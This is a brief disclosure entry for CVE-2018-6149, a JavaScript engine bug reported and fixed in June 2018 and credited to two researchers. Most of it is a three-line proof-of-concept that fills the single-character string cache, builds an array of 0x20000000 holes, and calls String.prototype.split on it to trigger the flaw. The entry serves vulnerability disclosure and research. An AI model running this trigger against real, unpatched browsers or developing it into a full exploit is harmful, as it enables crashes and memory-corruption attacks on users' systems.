CVE-2018-6149

  • Report: Jun 2018
  • Fix: Jun 2018
  • Credit: Yu Zhou and Jundong Xie of Ant-financial Light-Year Security Lab

PoC

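var str2 = String.fromCharCode(0x2c); // add `,` to the single-character string cache
var o2 = new Array(0x20000000); // array of length 0x20000000 in which every element is a hole
String.prototype.split.call(o2, ''); // ToString(o2) joins the holes with `,`; split('') then breaks that string into single characters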

Reference